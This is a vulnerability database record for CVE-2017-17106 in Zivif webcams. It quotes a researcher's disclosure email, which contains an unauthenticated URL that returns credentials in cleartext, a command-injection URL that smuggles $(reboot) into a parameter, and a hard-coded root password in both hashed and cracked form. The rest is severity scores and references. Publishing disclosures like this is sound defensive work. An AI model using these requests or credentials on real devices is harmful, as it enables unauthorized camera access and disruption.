Sign-up

ID

VAR-201712-0829


CVE

CVE-2017-17106


TITLE

Zivif Web Vulnerabilities related to certificate / password management in cameras

Trust: 0.8

sources: JVNDB: JVNDB-2017-011811

DESCRIPTION

Credentials for Zivif PR115-204-P-RS V2.3.4.2103 Webcams can be obtained by an unauthenticated remote attacker using a standard web /cgi-bin/hi3510/param.cgi?cmd=getuser HTTP request. This vulnerability exists because of a lack of authentication checks in requests to CGI pages. Zivif Web The camera contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. Attack vector: Remote Authentication: None Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com> Release date: December 10, 2017 Full Disclosure: 90 days CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 Vulnerable Device: Zivif PR115-204-P-RS Version: V2.3.4.2103 Timeline: 1 September 2017: Initial alerting to Zivif 1 September 2017: Zivif contact established. 3 September 2017: Details provided. 7 September 2017: Confirmation of vulnerabilities from Zivif 5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. 10 December 2017: This email -[Overview]- Implementation of access controls is Zivif cameras is severely lacking. This was first identified with the following request (CVE-2017-17106) http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser Cameras respond to this with: var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0 Credentials are returned in cleartext to the requester. In exploring, unauthenticated remote command injection is possible using (CVE-2017-17105) http://<Camera IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) Command results are not returned, however are executed by the system. One last findings was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107): root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh The encrypted password is cat1029. (none) login: root Password: Login incorrect (none) login: root Password: Welcome to SONIX. \u@\h:\W$ Because of the way the file system is structured, changing this password requires more work then running passwd. -[Note]- The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has lead me to speculate parts of this firmware may be shared with other cameras. -Silas

Trust: 2.43

sources: NVD: CVE-2017-17106 // JVNDB: JVNDB-2017-011811 // CNVD: CNVD-2018-01359 // VULHUB: VHN-108095 // VULMON: CVE-2017-17106 // PACKETSTORM: 145386

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-01359

AFFECTED PRODUCTS

vendor:zivifmodel:pr115-204-p-rsscope:eqversion:2.3.4.2103

Trust: 3.0

sources: CNVD: CNVD-2018-01359 // JVNDB: JVNDB-2017-011811 // CNNVD: CNNVD-201712-146 // NVD: CVE-2017-17106

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-17106
value: CRITICAL

Trust: 1.0

NVD: CVE-2017-17106
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2018-01359
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201712-146
value: CRITICAL

Trust: 0.6

VULHUB: VHN-108095
value: HIGH

Trust: 0.1

VULMON: CVE-2017-17106
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2017-17106
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2018-01359
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-108095
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-17106
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-01359 // VULHUB: VHN-108095 // VULMON: CVE-2017-17106 // JVNDB: JVNDB-2017-011811 // CNNVD: CNNVD-201712-146 // NVD: CVE-2017-17106

PROBLEMTYPE DATA

problemtype:CWE-522

Trust: 1.1

problemtype:CWE-255

Trust: 0.9

sources: VULHUB: VHN-108095 // JVNDB: JVNDB-2017-011811 // NVD: CVE-2017-17106

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201712-146

TYPE

trust management problem

Trust: 0.6

sources: CNNVD: CNNVD-201712-146

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2017-011811

PATCH
title:Top Pageurl:http://zivif.com/
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2017-011811

EXTERNAL IDS
db:NVDid:CVE-2017-17106
Trust: 3.3
db:PACKETSTORMid:145386
Trust: 3.3
db:JVNDBid:JVNDB-2017-011811
Trust: 0.8
db:CNNVDid:CNNVD-201712-146
Trust: 0.7
db:CNVDid:CNVD-2018-01359
Trust: 0.6
db:VULHUBid:VHN-108095
Trust: 0.1
db:VULMONid:CVE-2017-17106
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2018-01359 // 
            
            
            
            VULHUB: VHN-108095 // 
            
            
            
            VULMON: CVE-2017-17106 // 
            
            
            
            JVNDB: JVNDB-2017-011811 // 
            
            
            
            PACKETSTORM: 145386 // 
            
            
            
            CNNVD: CNNVD-201712-146 // 
            
            
            
            NVD: CVE-2017-17106

REFERENCES
url:http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html
Trust: 3.3
url:https://twitter.com/silascutler/status/938052460328968192
Trust: 2.6
url:http://seclists.org/fulldisclosure/2017/dec/42
Trust: 1.8
url:https://nvd.nist.gov/vuln/detail/cve-2017-17106
Trust: 0.9
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17106
Trust: 0.8
url:https://cwe.mitre.org/data/definitions/522.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:http://<camera
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2017-17107
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2017-17105
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2018-01359 // 
            
            
            
            VULHUB: VHN-108095 // 
            
            
            
            VULMON: CVE-2017-17106 // 
            
            
            
            JVNDB: JVNDB-2017-011811 // 
            
            
            
            PACKETSTORM: 145386 // 
            
            
            
            CNNVD: CNNVD-201712-146 // 
            
            
            
            NVD: CVE-2017-17106

CREDITS
Silas Cutler
Trust: 0.1
sources:
            
            
            PACKETSTORM: 145386

SOURCES
db:CNVDid:CNVD-2018-01359
db:VULHUBid:VHN-108095
db:VULMONid:CVE-2017-17106
db:JVNDBid:JVNDB-2017-011811
db:PACKETSTORMid:145386
db:CNNVDid:CNNVD-201712-146
db:NVDid:CVE-2017-17106

LAST UPDATE DATE
2024-08-14T14:33:18.626000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2018-01359date:2018-01-19T00:00:00
db:VULHUBid:VHN-108095date:2019-10-03T00:00:00
db:VULMONid:CVE-2017-17106date:2019-10-03T00:00:00
db:JVNDBid:JVNDB-2017-011811date:2018-01-29T00:00:00
db:CNNVDid:CNNVD-201712-146date:2019-10-23T00:00:00
db:NVDid:CVE-2017-17106date:2019-10-03T00:03:26.223

SOURCES RELEASE DATE
db:CNVDid:CNVD-2018-01359date:2018-01-19T00:00:00
db:VULHUBid:VHN-108095date:2017-12-19T00:00:00
db:VULMONid:CVE-2017-17106date:2017-12-19T00:00:00
db:JVNDBid:JVNDB-2017-011811date:2018-01-29T00:00:00
db:PACKETSTORMid:145386date:2017-12-13T16:50:24
db:CNNVDid:CNNVD-201712-146date:2017-12-05T00:00:00
db:NVDid:CVE-2017-17106date:2017-12-19T02:29:41.597